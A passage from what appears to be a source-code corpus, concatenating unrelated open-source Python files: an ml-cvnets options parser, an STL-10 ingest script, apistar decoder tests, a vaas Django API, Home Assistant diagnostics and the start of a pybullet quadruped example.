'drop *_thinningThingProducerN_*_*',
)
)
process.out2 = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('good2DataFormatsFWLite.root')
)
process.out_other = cms.OutputModule("PoolOutputModule",
outputCommands = cms.untracked.vstring('drop *',
'keep edmtestOtherThings_*_*_*',
'keep *_TriggerResults_*_*'),
fileName = cms.untracked.string('other_onlyDataFormatsFWLite.root')
)
process.thinningTestPath = cms.Path(process.thingProducer
* process.trackOfThingsProducerA
* process.trackOfThingsProducerB
* process.trackOfThingsProducerC
* process.trackOfThingsProducerD
* process.trackOfThingsProducerDMinus
* process.trackOfThingsProducerDPlus
* process.trackOfThingsProducerE
* process.trackOfThingsProducerF
* process.trackOfThingsProducerG
* process.trackOfThingsProducerH
* process.trackOfThingsProducerI
* process.trackOfThingsProducerJ
* process.trackOfThingsProducerK
* process.trackOfThingsProducerL
* process.trackOfThingsProducerM
* process.trackOfThingsProducerN
* process.trackOfThingsProducerO
* process.thinningThingProducerA
* process.thinningThingProducerB
* process.thinningThingProducerC
* process.thinningThingProducerD
* process.thinningThingProducerE
* process.thinningThingProducerF
* process.thinningThingProducerG
* process.thinningThingProducerH
* process.thinningThingProducerI
* process.thinningThingProducerJ
* process.thinningThingProducerK
* process.thinningThingProducerL
* process.thinningThingProducerM
* process.thinningThingProducerN
* process.thinningThingProducerO
)
process.p = cms.Path(process.Thing*process.OtherThing)
process.outp = cms.EndPath(process.out*process.out2*process.out_other)
|
options/opts.py | apple/ml-cvnets | 209 | 29794 | #
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
import argparse
from typing import Optional
from data.sampler import arguments_sampler
from data.collate_fns import arguments_collate_fn
from options.utils import load_config_file
from data.datasets import arguments_dataset
from cvnets import arguments_model, arguments_nn_layers, arguments_ema
from cvnets.anchor_generator import arguments_anchor_gen
from loss_fn import arguments_loss_fn
from optim import arguments_optimizer
from optim.scheduler import arguments_scheduler
from common import SUPPORTED_MODALITIES
from data.transforms import arguments_augmentation
from metrics import arguments_stats
from data.video_reader import arguments_video_reader
from cvnets.matcher_det import arguments_box_matcher
from utils import logger
class ParseKwargs(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
namespace_dict = vars(namespace)
if len(values) > 0:
override_dict = {}
# values are list of key-value pairs
for value in values:
key = None
try:
key, value = value.split("=")
except ValueError as e:
logger.error(
"For override arguments, a key-value pair of the form key=value is expected"
)
if key in namespace_dict:
value_namespace = namespace_dict[key]
if value_namespace is None and value is None:
value = None
elif value_namespace is None and value is not None:
# possibly a string or list of strings or list of integers
# check if string is a list or not
value = value.split(",")
if len(value) == 1:
# it's a string
value = str(value[0])
# check if its empty string or not
if value == "" or value.lower() == "none":
value = None
else:
# it's a list of integers or strings
try:
# convert to int
value = [int(v) for v in value]
except:
# pass because its a string
pass
else:
try:
if value.lower() == "true": # check for boolean
value = True
elif value.lower() == "false":
value = False
else:
desired_type = type(value_namespace)
value = desired_type(value)
except ValueError as e:
logger.warning(
"Type mismatch while over-riding. Skipping key: {}".format(
key
)
)
continue
override_dict[key] = value
setattr(namespace, "override_args", override_dict)
else:
setattr(namespace, "override_args", None)
def arguments_common(parser: argparse.ArgumentParser) -> argparse.ArgumentParser:
group = parser.add_argument_group(
title="Common arguments", description="Common arguments"
)
group.add_argument("--common.seed", type=int, default=0, help="Random seed")
group.add_argument(
"--common.config-file", type=str, default=None, help="Configuration file"
)
group.add_argument(
"--common.results-loc",
type=str,
default="results",
help="Directory where results will be stored",
)
group.add_argument(
"--common.run-label",
type=str,
default="run_1",
help="Label id for the current run",
)
group.add_argument(
"--common.resume", type=str, default=None, help="Resume location"
)
group.add_argument(
"--common.finetune_imagenet1k",
type=str,
default=None,
help="Checkpoint location to be used for finetuning",
)
group.add_argument(
"--common.finetune_imagenet1k-ema",
type=str,
default=None,
help="EMA Checkpoint location to be used for finetuning",
)
group.add_argument(
"--common.mixed-precision", action="store_true", help="Mixed precision training"
)
group.add_argument(
"--common.accum-freq",
type=int,
default=1,
help="Accumulate gradients for this number of iterations",
)
group.add_argument(
"--common.accum-after-epoch",
type=int,
default=0,
help="Start accumulation after this many epochs",
)
group.add_argument(
"--common.log-freq",
type=int,
default=100,
help="Display after these many iterations",
)
group.add_argument(
"--common.auto-resume",
action="store_true",
help="Resume training from the last checkpoint",
)
group.add_argument(
"--common.grad-clip", type=float, default=None, help="Gradient clipping value"
)
group.add_argument(
"--common.k-best-checkpoints",
type=int,
default=5,
help="Keep k-best checkpoints",
)
group.add_argument(
"--common.inference-modality",
type=str,
default="image",
choices=SUPPORTED_MODALITIES,
help="Inference modality. Image or videos",
)
group.add_argument(
"--common.channels-last",
action="store_true",
default=False,
help="Use channel last format during training. "
"Note 1: that some models may not support it, so we recommend to use it with caution"
"Note 2: Channel last format does not work with 1-, 2-, and 3- tensors. "
"Therefore, we support it via custom collate functions",
)
group.add_argument(
"--common.tensorboard-logging",
action="store_true",
help="Enable tensorboard logging",
)
group.add_argument(
"--common.bolt-logging", action="store_true", help="Enable bolt logging"
)
group.add_argument(
"--common.override-kwargs",
nargs="*",
action=ParseKwargs,
help="Override arguments. Example. To override the value of --sampler.vbs.crop-size-width, "
"we can pass override argument as "
"--common.override-kwargs sampler.vbs.crop_size_width=512 \n "
"Note that keys in override arguments do not contain -- or -",
)
group.add_argument(
"--common.enable-coreml-compatible-module",
action="store_true",
help="Use coreml compatible modules (if applicable) during inference",
)
group.add_argument(
"--common.debug-mode",
action="store_true",
help="You can use this flag for debugging purposes.",
)
return parser
def arguments_ddp(parser: argparse.ArgumentParser) -> argparse.ArgumentParser:
group = parser.add_argument_group(
title="DDP arguments", description="DDP arguments"
)
group.add_argument("--ddp.disable", action="store_true", help="Don't use DDP")
group.add_argument(
"--ddp.rank", type=int, default=0, help="Node rank for distributed training"
)
group.add_argument(
"--ddp.world-size", type=int, default=-1, help="World size for DDP"
)
group.add_argument("--ddp.dist-url", type=str, default=None, help="DDP URL")
group.add_argument(
"--ddp.dist-port",
type=int,
default=30786,
help="DDP Port. Only used when --ddp.dist-url is not specified",
)
group.add_argument("--ddp.device-id", type=int, default=None, help="Device ID")
group.add_argument(
"--ddp.no-spawn", action="store_true", help="Don't use DDP with spawn"
)
group.add_argument(
"--ddp.backend", type=str, default="nccl", help="DDP backend. Default is nccl"
)
group.add_argument(
"--ddp.find-unused-params",
action="store_true",
help="Find unused params in model. useful for debugging with DDP",
)
return parser
def get_training_arguments(parse_args: Optional[bool] = True):
parser = argparse.ArgumentParser(description="Training arguments", add_help=True)
# sampler related arguments
parser = arguments_sampler(parser=parser)
# dataset related arguments
parser = arguments_dataset(parser=parser)
# anchor generator arguments
parser = arguments_anchor_gen(parser=parser)
# arguments related to box matcher
parser = arguments_box_matcher(parser=parser)
# Video reader related arguments
parser = arguments_video_reader(parser=parser)
# collate fn related arguments
parser = arguments_collate_fn(parser=parser)
# transform related arguments
parser = arguments_augmentation(parser=parser)
# model related arguments
parser = arguments_nn_layers(parser=parser)
parser = arguments_model(parser=parser)
parser = arguments_ema(parser=parser)
# loss function arguments
parser = arguments_loss_fn(parser=parser)
# optimizer arguments
parser = arguments_optimizer(parser=parser)
parser = arguments_scheduler(parser=parser)
# DDP arguments
parser = arguments_ddp(parser=parser)
# stats arguments
parser = arguments_stats(parser=parser)
# common
parser = arguments_common(parser=parser)
if parse_args:
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
else:
return parser
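# Typical entry-point flow (illustrative): the parsed options form a flat argparse
# namespace whose attributes keep their dotted names, so downstream code reads them
# with getattr, e.g.
#
#   opts = get_training_arguments()
#   seed = getattr(opts, "common.seed", 0)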
def get_eval_arguments(parse_args=True):
return get_training_arguments(parse_args=parse_args)
def get_conversion_arguments():
parser = get_training_arguments(parse_args=False)
# Arguments related to coreml conversion
group = parser.add_argument_group("Conversion arguments")
group.add_argument(
"--conversion.coreml-extn",
type=str,
default="mlmodel",
help="Extension for converted model. Default is mlmodel",
)
group.add_argument(
"--conversion.input-image-path",
type=str,
default=None,
help="Path of the image to be used for conversion",
)
# Arguments related to server.
group.add_argument(
"--conversion.bucket-name", type=str, help="Model job's bucket name"
)
group.add_argument("--conversion.task-id", type=str, help="Model job's id")
group.add_argument(
"--conversion.viewers",
type=str,
nargs="+",
default=None,
help="Users who can view your models on server",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
def get_bencmarking_arguments():
parser = get_training_arguments(parse_args=False)
#
group = parser.add_argument_group("Benchmarking arguments")
group.add_argument(
"--benchmark.batch-size",
type=int,
default=1,
help="Batch size for benchmarking",
)
group.add_argument(
"--benchmark.warmup-iter", type=int, default=10, help="Warm-up iterations"
)
group.add_argument(
"--benchmark.n-iter",
type=int,
default=100,
help="Number of iterations for benchmarking",
)
group.add_argument(
"--benchmark.use-jit-model",
action="store_true",
help="Convert the model to JIT and then benchmark it",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
def get_segmentation_eval_arguments():
parser = get_training_arguments(parse_args=False)
group = parser.add_argument_group("Segmentation evaluation related arguments")
group.add_argument(
"--evaluation.segmentation.apply-color-map",
action="store_true",
help="Apply color map to different classes in segmentation masks. Useful in visualization "
"+ some competitions (e.g, PASCAL VOC) accept submissions with colored segmentation masks",
)
group.add_argument(
"--evaluation.segmentation.save-overlay-rgb-pred",
action="store_true",
help="enable this flag to visualize predicted masks on top of input image",
)
group.add_argument(
"--evaluation.segmentation.save-masks",
action="store_true",
help="save predicted masks without colormaps. Useful for submitting to "
"competitions like Cityscapes",
)
group.add_argument(
"--evaluation.segmentation.overlay-mask-weight",
default=0.5,
type=float,
help="Contribution of mask when overlaying on top of RGB image. ",
)
group.add_argument(
"--evaluation.segmentation.mode",
type=str,
default="validation_set",
required=False,
choices=["single_image", "image_folder", "validation_set"],
help="Contribution of mask when overlaying on top of RGB image. ",
)
group.add_argument(
"--evaluation.segmentation.path",
type=str,
default=None,
help="Path of the image or image folder (only required for single_image and image_folder modes)",
)
group.add_argument(
"--evaluation.segmentation.num-classes",
        type=int,
default=None,
help="Number of segmentation classes used during training",
)
group.add_argument(
"--evaluation.segmentation.resize-input-images",
action="store_true",
help="Resize input images",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
def get_detection_eval_arguments():
parser = get_training_arguments(parse_args=False)
group = parser.add_argument_group("Detection evaluation related arguments")
group.add_argument(
"--evaluation.detection.save-overlay-boxes",
action="store_true",
help="enable this flag to visualize predicted masks on top of input image",
)
group.add_argument(
"--evaluation.detection.mode",
type=str,
default="validation_set",
required=False,
choices=["single_image", "image_folder", "validation_set"],
help="Contribution of mask when overlaying on top of RGB image. ",
)
group.add_argument(
"--evaluation.detection.path",
type=str,
default=None,
help="Path of the image or image folder (only required for single_image and image_folder modes)",
)
group.add_argument(
"--evaluation.detection.num-classes",
        type=int,
        default=None,
        help="Number of detection classes used during training",
)
group.add_argument(
"--evaluation.detection.resize-input-images",
action="store_true",
default=False,
help="Resize the input images",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
def get_loss_landscape_args():
parser = get_training_arguments(parse_args=False)
group = parser.add_argument_group("Loss landscape related arguments")
group.add_argument(
"--loss-landscape.n-points",
type=int,
default=11,
help="No. of grid points. Default is 11, so we have 11x11 grid",
)
group.add_argument(
"--loss-landscape.min-x",
type=float,
default=-1.0,
help="Min. value along x-axis",
)
group.add_argument(
"--loss-landscape.max-x",
type=float,
default=1.0,
help="Max. value along x-axis",
)
group.add_argument(
"--loss-landscape.min-y",
type=float,
default=-1.0,
help="Min. value along y-axis",
)
group.add_argument(
"--loss-landscape.max-y",
type=float,
default=1.0,
help="Max. value along y-axis",
)
# parse args
opts = parser.parse_args()
opts = load_config_file(opts)
return opts
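# ---------------------------------------------------------------------------
# Illustrative usage sketch (added for clarity, not part of the original
# module). The invocation and flag values below are hypothetical; it assumes
# the helpers above and load_config_file are importable as shown.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    # e.g. python <this_file>.py --ddp.rank 0 --benchmark.batch-size 8
    opts = get_training_arguments(parse_args=True)
    # argparse keeps the dots in the option names, so values are read back
    # with getattr/vars rather than plain attribute access.
    print(getattr(opts, "ddp.rank", 0))
    print(getattr(opts, "benchmark.batch_size", 1))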
|
ArtGAN/data/ingest_stl10.py | rh01/caffe-model-for-category-artgan | 304 | 29815 | from configargparse import ArgParser
from PIL import Image
import logging
import numpy as np
import os
def transform_and_save(img_arr, output_filename):
"""
Takes an image and optionally transforms it and then writes it out to output_filename
"""
img = Image.fromarray(img_arr)
img.save(output_filename)
class Ingest(object):
def __init__(self, input_dir, out_dir, target_size=96, skipimg=False):
np.random.seed(0)
self.skipimg = skipimg
self.out_dir = out_dir
self.input_dir = input_dir
self.manifests = dict()
for setn in ('train', 'val'):
self.manifests[setn] = os.path.join(self.out_dir, '{}-index.csv'.format(setn))
self.target_size = target_size
self.trainpairlist = {}
self.valpairlist = {}
self.labels = range(10)
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.outimgdir = os.path.join(self.out_dir, 'images')
if not os.path.exists(self.outimgdir):
os.mkdir(self.outimgdir)
os.mkdir(os.path.join(self.outimgdir, 'train'))
os.mkdir(os.path.join(self.outimgdir, 'val'))
self.outlabeldir = os.path.join(self.out_dir, 'labels')
if not os.path.exists(self.outlabeldir):
os.mkdir(self.outlabeldir)
def collectdata(self,):
print 'Start Collect Data...'
train_x_path = os.path.join(self.input_dir, 'train_X.bin')
train_y_path = os.path.join(self.input_dir, 'train_y.bin')
test_x_path = os.path.join(self.input_dir, 'test_X.bin')
test_y_path = os.path.join(self.input_dir, 'test_y.bin')
train_xf = open(train_x_path, 'rb')
train_x = np.fromfile(train_xf, dtype=np.uint8)
train_x = np.reshape(train_x, (-1, 3, 96, 96))
train_x = np.transpose(train_x, (0, 3, 2, 1))
train_yf = open(train_y_path, 'rb')
train_y = np.fromfile(train_yf, dtype=np.uint8)
test_xf = open(test_x_path, 'rb')
test_x = np.fromfile(test_xf, dtype=np.uint8)
test_x = np.reshape(test_x, (-1, 3, 96, 96))
test_x = np.transpose(test_x, (0, 3, 2, 1))
test_yf = open(test_y_path, 'rb')
test_y = np.fromfile(test_yf, dtype=np.uint8)
idx = np.zeros(10, dtype=np.int)
for i in xrange(train_x.shape[0]):
outdir = os.path.join(self.outimgdir, 'train', str(train_y[i]-1))
if not os.path.exists(outdir):
os.mkdir(outdir)
if not self.skipimg:
transform_and_save(img_arr=train_x[i], output_filename=os.path.join(outdir, str(idx[train_y[i]-1]) + '.jpg'))
self.trainpairlist[os.path.join('images', 'train', str(train_y[i]-1), str(idx[train_y[i]-1]) + '.jpg')] = \
os.path.join('labels', str(train_y[i] - 1) + '.txt')
idx[train_y[i]-1] += 1
idx = np.zeros(10, dtype=np.int)
for i in xrange(test_x.shape[0]):
outdir = os.path.join(self.outimgdir, 'val', str(test_y[i]-1))
if not os.path.exists(outdir):
os.mkdir(outdir)
if not self.skipimg:
transform_and_save(img_arr=test_x[i],
output_filename=os.path.join(outdir, str(idx[test_y[i]-1]) + '.jpg'))
self.valpairlist[os.path.join('images', 'val', str(test_y[i]-1), str(idx[test_y[i]-1]) + '.jpg')] = \
os.path.join('labels', str(test_y[i] - 1) + '.txt')
idx[test_y[i]-1] += 1
print 'Finished Collect Data...'
def write_label(self, ):
for i, l in enumerate(self.labels):
sdir = os.path.join(self.outlabeldir, str(i) + '.txt')
np.savetxt(sdir, [l], '%d')
def run(self):
"""
resize images then write manifest files to disk.
"""
self.write_label()
self.collectdata()
records = [(fname, tgt)
for fname, tgt in self.trainpairlist.items()]
np.savetxt(self.manifests['train'], records, fmt='%s,%s')
records = [(fname, tgt)
for fname, tgt in self.valpairlist.items()]
np.savetxt(self.manifests['val'], records, fmt='%s,%s')
class IngestUnlabeled(object):
def __init__(self, input_dir, out_dir, target_size=96, skipimg=False):
np.random.seed(0)
self.skipimg = skipimg
self.out_dir = out_dir
self.input_dir = input_dir
self.manifests = os.path.join(self.out_dir, 'unlabeled-index.csv')
self.target_size = target_size
self.trainpairlist = {}
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.outimgdir = os.path.join(self.out_dir, 'images')
if not os.path.exists(self.outimgdir):
os.mkdir(self.outimgdir)
self.unlabeldir = os.path.join(self.outimgdir, 'unlabeled')
if not os.path.exists(self.unlabeldir):
os.mkdir(self.unlabeldir)
def collectdata(self,):
print 'Start Collect Data...'
train_x_path = os.path.join(self.input_dir, 'unlabeled_X.bin')
train_xf = open(train_x_path, 'rb')
train_x = np.fromfile(train_xf, dtype=np.uint8)
train_x = np.reshape(train_x, (-1, 3, 96, 96))
train_x = np.transpose(train_x, (0, 3, 2, 1))
idx = 0
for i in xrange(train_x.shape[0]):
if not self.skipimg:
transform_and_save(img_arr=train_x[i], output_filename=os.path.join(self.unlabeldir, str(idx) + '.jpg'))
self.trainpairlist[os.path.join('images', 'unlabeled', str(idx) + '.jpg')] = 'labels/11.txt'
idx += 1
print 'Finished Collect Data...'
def write_label(self, ):
sdir = os.path.join(self.out_dir, 'labels', '11.txt')
np.savetxt(sdir, [11], '%d')
def run(self):
"""
resize images then write manifest files to disk.
"""
self.write_label()
self.collectdata()
records = [(fname, tgt)
for fname, tgt in self.trainpairlist.items()]
np.savetxt(self.manifests, records, fmt='%s,%s')
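# Illustrative helper (sketch, added for clarity, not part of the original
# script): the manifests written by Ingest.run() and IngestUnlabeled.run() are
# plain "image_path,label_path" CSV files, so they can be previewed with numpy.
# The manifest_path argument is whatever manifest file was written above.
def preview_manifest(manifest_path, n=5):
    records = np.loadtxt(manifest_path, dtype=str, delimiter=',')
    for image_path, label_path in records[:n]:
        print("%s -> %s" % (image_path, label_path))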
if __name__ == "__main__":
parser = ArgParser()
parser.add_argument('--input_dir', help='Directory to find input',
default='/hdd/Dataset/STL10')
parser.add_argument('--out_dir', help='Directory to write ingested files',
default='/home/william/PyProjects/TFcodes/dataset/stl10')
parser.add_argument('--target_size', type=int, default=96,
help='Size in pixels to scale shortest side DOWN to (0 means no scaling)')
parser.add_argument('--skipImg', type=bool, default=False,
help='True to skip processing and copying images')
args = parser.parse_args()
logger = logging.getLogger(__name__)
bw = Ingest(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg)
# bw = IngestUnlabeled(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg)
bw.run()
|
tests/client/test_decoders.py | timgates42/apistar | 4,284 | 29825 | import os
from starlette.applications import Starlette
from starlette.responses import PlainTextResponse, Response
from starlette.testclient import TestClient
from apistar.client import Client, decoders
app = Starlette()
@app.route("/text-response/")
def text_response(request):
return PlainTextResponse("hello, world")
@app.route("/file-response/")
def file_response(request):
headers = {
"Content-Type": "image/png",
"Content-Disposition": 'attachment; filename="filename.png"',
}
return Response(b"<somedata>", headers=headers)
@app.route("/file-response-url-filename/name.png")
def file_response_url_filename(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
@app.route("/file-response-no-extension/name")
def file_response_no_extension(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
@app.route("/")
def file_response_no_name(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
schema = {
"openapi": "3.0.0",
"info": {"title": "Test API", "version": "1.0"},
"servers": [{"url": "http://testserver"}],
"paths": {
"/text-response/": {"get": {"operationId": "text-response"}},
"/file-response/": {"get": {"operationId": "file-response"}},
"/file-response-url-filename/name.png": {
"get": {"operationId": "file-response-url-filename"}
},
"/file-response-no-extension/name": {
"get": {"operationId": "file-response-no-extension"}
},
"/": {"get": {"operationId": "file-response-no-name"}},
},
}
def test_text_response():
client = Client(schema, session=TestClient(app))
data = client.request("text-response")
assert data == "hello, world"
def test_file_response():
client = Client(schema, session=TestClient(app))
data = client.request("file-response")
assert os.path.basename(data.name) == "filename.png"
assert data.read() == b"<somedata>"
def test_file_response_url_filename():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-url-filename")
assert os.path.basename(data.name) == "name.png"
assert data.read() == b"<somedata>"
def test_file_response_no_extension():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-no-extension")
assert os.path.basename(data.name) == "name.png"
assert data.read() == b"<somedata>"
def test_file_response_no_name():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-no-name")
assert os.path.basename(data.name) == "download.png"
assert data.read() == b"<somedata>"
def test_unique_filename(tmpdir):
client = Client(
schema, session=TestClient(app), decoders=[decoders.DownloadDecoder(tmpdir)]
)
data = client.request("file-response")
assert os.path.basename(data.name) == "filename.png"
assert data.read() == b"<somedata>"
data = client.request("file-response")
assert os.path.basename(data.name) == "filename (1).png"
assert data.read() == b"<somedata>"
|
vaas-app/src/vaas/manager/api.py | allegro/vaas | 251 | 29849 | # -*- coding: utf-8 -*-
import logging
from celery.result import AsyncResult
from tastypie.resources import ModelResource, ALL_WITH_RELATIONS, Resource
from tastypie import fields
from tastypie.fields import ListField
from tastypie.authentication import ApiKeyAuthentication, MultiAuthentication, SessionAuthentication
from vaas.external.api import ExtendedDjangoAuthorization as DjangoAuthorization
from vaas.external.tasty_validation import ModelCleanedDataFormValidation
from vaas.external.serializer import PrettyJSONSerializer
from vaas.cluster.api import DcResource
from vaas.manager.forms import ProbeModelForm, DirectorModelForm, BackendModelForm, TimeProfileModelForm
from vaas.manager.models import Backend, Probe, Director, TimeProfile, ReloadTask
from vaas.monitor.models import BackendStatus
from vaas.external.oauth import VaasMultiAuthentication
logger = logging.getLogger('vaas')
class TimeProfileResource(ModelResource):
class Meta:
queryset = TimeProfile.objects.all()
resource_name = 'time_profile'
serializer = PrettyJSONSerializer()
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication())
validation = ModelCleanedDataFormValidation(form_class=TimeProfileModelForm)
always_return_data = True
filtering = {
'max_connections': ['exact'],
'connect_timeout': ['exact'],
'first_byte_timeout': ['exact'],
'between_bytes_timeout': ['exact']
}
class ProbeResource(ModelResource):
class Meta:
queryset = Probe.objects.all()
resource_name = 'probe'
serializer = PrettyJSONSerializer()
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication())
validation = ModelCleanedDataFormValidation(form_class=ProbeModelForm)
always_return_data = True
filtering = {
'name': ['exact'],
'url': ['exact'],
'expected_response': ['exact']
}
class DirectorResource(ModelResource):
probe = fields.ForeignKey(ProbeResource, 'probe', full=True)
time_profile = fields.ForeignKey(TimeProfileResource, 'time_profile', full=True)
backends = fields.ToManyField(
'vaas.manager.api.BackendResource', 'backends', null=True
)
cluster = fields.ToManyField(
'vaas.cluster.api.LogicalClusterResource', 'cluster', null=True, full=True
)
class Meta:
queryset = Director.objects.all()
resource_name = 'director'
serializer = PrettyJSONSerializer()
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication(), SessionAuthentication())
validation = ModelCleanedDataFormValidation(form_class=DirectorModelForm)
always_return_data = True
filtering = {
'name': ['exact'],
'enabled': ['exact'],
'probe': ALL_WITH_RELATIONS,
'cluster': ALL_WITH_RELATIONS,
'service': ['exact'],
'virtual': ['exact'],
'service_tag': ['exact'],
'reachable_via_service_mesh': ['exact'],
}
def save_m2m(self, bundle):
try:
new_uris = bundle.obj.new_clusters_uris
bundle.obj.new_clusters = [cluster.obj for cluster in bundle.data['cluster']
if cluster.data['resource_uri'] in new_uris]
logger.info("[DirectorResource.save_m2m()] new_clusters = %s", bundle.obj.new_clusters)
except (AttributeError, KeyError):
pass
return super(DirectorResource, self).save_m2m(bundle)
def update_in_place(self, request, original_bundle, new_data):
try:
original_bundle.obj.old_clusters = list(original_bundle.obj.cluster.all())
except AttributeError:
original_bundle.obj.old_clusters = []
logger.info("[DirectorResource.update_in_place()] old_clusters = %s", original_bundle.obj.old_clusters)
try:
original_bundle.obj.new_clusters_uris = new_data['cluster']
except KeyError:
original_bundle.obj.new_clusters_uris = []
original_bundle.obj.new_data = new_data
return super(DirectorResource, self).update_in_place(request, original_bundle, new_data)
class BackendResource(ModelResource):
dc = fields.ForeignKey(DcResource, 'dc', full=True)
director = fields.ForeignKey(DirectorResource, 'director')
tags = ListField()
class Meta:
queryset = Backend.objects.all()
resource_name = 'backend'
serializer = PrettyJSONSerializer()
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication())
validation = ModelCleanedDataFormValidation(form_class=BackendModelForm)
always_return_data = True
filtering = {
'dc': ALL_WITH_RELATIONS,
'director': ALL_WITH_RELATIONS,
'address': ['exact'],
'port': ['exact']
}
def dehydrate(self, bundle):
status = BackendStatus.objects.filter(address=bundle.data['address'],
port=bundle.data['port'])
if len(status) > 0:
bundle.data['status'] = status[0].status
else:
bundle.data['status'] = "Unknown"
bundle.data['time_profile'] = {
'max_connections': bundle.obj.director.time_profile.max_connections,
'connect_timeout': bundle.obj.director.time_profile.connect_timeout,
'first_byte_timeout': bundle.obj.director.time_profile.first_byte_timeout,
'between_bytes_timeout': bundle.obj.director.time_profile.between_bytes_timeout
}
return bundle
def build_filters(self, filters=None, ignore_bad_filters=False):
if filters is None:
filters = {}
orm_filters = super(BackendResource, self).build_filters(filters, ignore_bad_filters=ignore_bad_filters)
if 'tag' in filters:
orm_filters['tags__name__in'] = filters['tag'].split(',')
return orm_filters
def dehydrate_tags(self, bundle):
return list(map(str, bundle.obj.tags.all()))
def hydrate_tags(self, bundle):
if isinstance(bundle.data.get('tags'), list):
bundle.data['tags'] = ','.join(bundle.data['tags'])
elif bundle.data.get('tags') is None:
bundle.data['tags'] = ''
return bundle
def save_m2m(self, bundle):
tags = bundle.data.get('tags', [])
bundle.obj.tags.set(*tags)
return super(BackendResource, self).save_m2m(bundle)
class ReloadTaskResource(Resource):
status = fields.CharField(attribute='status')
info = fields.CharField(attribute='info')
class Meta:
resource_name = 'task'
list_allowed_methods = ['get']
authorization = DjangoAuthorization()
authentication = VaasMultiAuthentication(ApiKeyAuthentication())
fields = ['status', 'info']
include_resource_uri = True
def obj_get(self, bundle, **kwargs):
task = AsyncResult(kwargs['pk'])
return ReloadTask(kwargs['pk'], task.status, '{}'.format(task.info))
def get_object_list(self, request):
return None
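# Illustrative wiring sketch (added for clarity, not part of the original
# module): in a typical tastypie project the resources above are registered on
# an Api object from the project's urls.py. The api_name used here is an
# assumption.
def build_manager_api(api_name='v0.1'):
    from tastypie.api import Api
    api = Api(api_name=api_name)
    for resource_class in (ProbeResource, TimeProfileResource, DirectorResource,
                           BackendResource, ReloadTaskResource):
        api.register(resource_class())
    return api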
|
homeassistant/components/launch_library/diagnostics.py | MrDelik/core | 30,023 | 29874 | """Diagnostics support for Launch Library."""
from __future__ import annotations
from typing import Any
from pylaunches.objects.event import Event
from pylaunches.objects.launch import Launch
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from . import LaunchLibraryData
from .const import DOMAIN
async def async_get_config_entry_diagnostics(
hass: HomeAssistant,
entry: ConfigEntry,
) -> dict[str, Any]:
"""Return diagnostics for a config entry."""
coordinator: DataUpdateCoordinator[LaunchLibraryData] = hass.data[DOMAIN]
if coordinator.data is None:
return {}
def _first_element(data: list[Launch | Event]) -> dict[str, Any] | None:
if not data:
return None
return data[0].raw_data_contents
return {
"next_launch": _first_element(coordinator.data["upcoming_launches"]),
"starship_launch": _first_element(
coordinator.data["starship_events"].upcoming.launches
),
"starship_event": _first_element(
coordinator.data["starship_events"].upcoming.events
),
}
|
examples/pybullet/examples/quadruped.py | felipeek/bullet3 | 9,136 | 29881 | import pybullet as p
import time
import math
import pybullet_data
def drawInertiaBox(parentUid, parentLinkIndex, color):
dyn = p.getDynamicsInfo(parentUid, parentLinkIndex)
mass = dyn[0]
frictionCoeff = dyn[1]
inertia = dyn[2]
if (mass > 0):
Ixx = inertia[0]
Iyy = inertia[1]
Izz = inertia[2]
boxScaleX = 0.5 * math.sqrt(6 * (Izz + Iyy - Ixx) / mass)
boxScaleY = 0.5 * math.sqrt(6 * (Izz + Ixx - Iyy) / mass)
boxScaleZ = 0.5 * math.sqrt(6 * (Ixx + Iyy - Izz) / mass)
halfExtents = [boxScaleX, boxScaleY, boxScaleZ]
pts = [[halfExtents[0], halfExtents[1], halfExtents[2]],
[-halfExtents[0], halfExtents[1], halfExtents[2]],
[halfExtents[0], -halfExtents[1], halfExtents[2]],
[-halfExtents[0], -halfExtents[1], halfExtents[2]],
[halfExtents[0], halfExtents[1], -halfExtents[2]],
[-halfExtents[0], halfExtents[1], -halfExtents[2]],
[halfExtents[0], -halfExtents[1], -halfExtents[2]],
[-halfExtents[0], -halfExtents[1], -halfExtents[2]]]
    edges = [(0, 1), (1, 3), (3, 2), (2, 0), (0, 4), (1, 5), (2, 6), (3, 7),
             (4, 5), (5, 7), (7, 6), (6, 4)]
    for start, end in edges:
      p.addUserDebugLine(pts[start],
                         pts[end],
                         color,
                         1,
                         parentObjectUniqueId=parentUid,
                         parentLinkIndex=parentLinkIndex)
toeConstraint = True
useMaximalCoordinates = False
useRealTime = 0
#the fixedTimeStep and numSolverIterations are the most important parameters to trade-off quality versus performance
fixedTimeStep = 1. / 100
numSolverIterations = 50
if (useMaximalCoordinates):
fixedTimeStep = 1. / 500
numSolverIterations = 200
speed = 10
amplitude = 0.8
jump_amp = 0.5
maxForce = 3.5
kneeFrictionForce = 0
kp = 1
kd = .5
maxKneeForce = 1000
physId = p.connect(p.SHARED_MEMORY_GUI)
if (physId < 0):
p.connect(p.GUI)
#p.resetSimulation()
